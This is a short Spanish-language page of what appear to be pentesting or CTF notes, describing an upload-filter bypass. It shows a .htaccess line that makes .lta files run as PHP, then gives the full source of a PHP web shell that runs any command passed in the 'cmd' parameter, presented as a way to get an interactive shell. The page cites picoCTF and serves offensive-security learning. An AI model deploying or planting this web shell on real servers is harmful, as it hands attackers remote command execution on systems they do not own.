Bypass

Formas de evadir ciertas reglas del objetivo.

Arbitrary Upload File `.htaccess`

Subir un archivo `.htaccess`

Sube un archivo .htaccess con el siguiente contenido:

AddType application/x-httpd-php .lta

Será interpretado como php.

Subir el archivo `exploit.lta`

Asi como este archivo de ejemplo exploit.lta.

Código de exploit.lta:

exploit.lta

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

Resultado

Obteniendo asi una cmd interactiva:

Referencias

Online - ReverseShell
InfoSecWriteups
picoCTF (Challenge 518)

PreviousBúsqueda de archivos NextXSS Examples

Last updated 4 months ago

hashtagArbitrary Upload File .htaccess

hashtagSubir un archivo .htaccess

hashtagSubir el archivo exploit.lta

hashtagResultado

hashtagReferencias

Arbitrary Upload File `.htaccess`

Subir un archivo `.htaccess`

Subir el archivo `exploit.lta`

Resultado

Referencias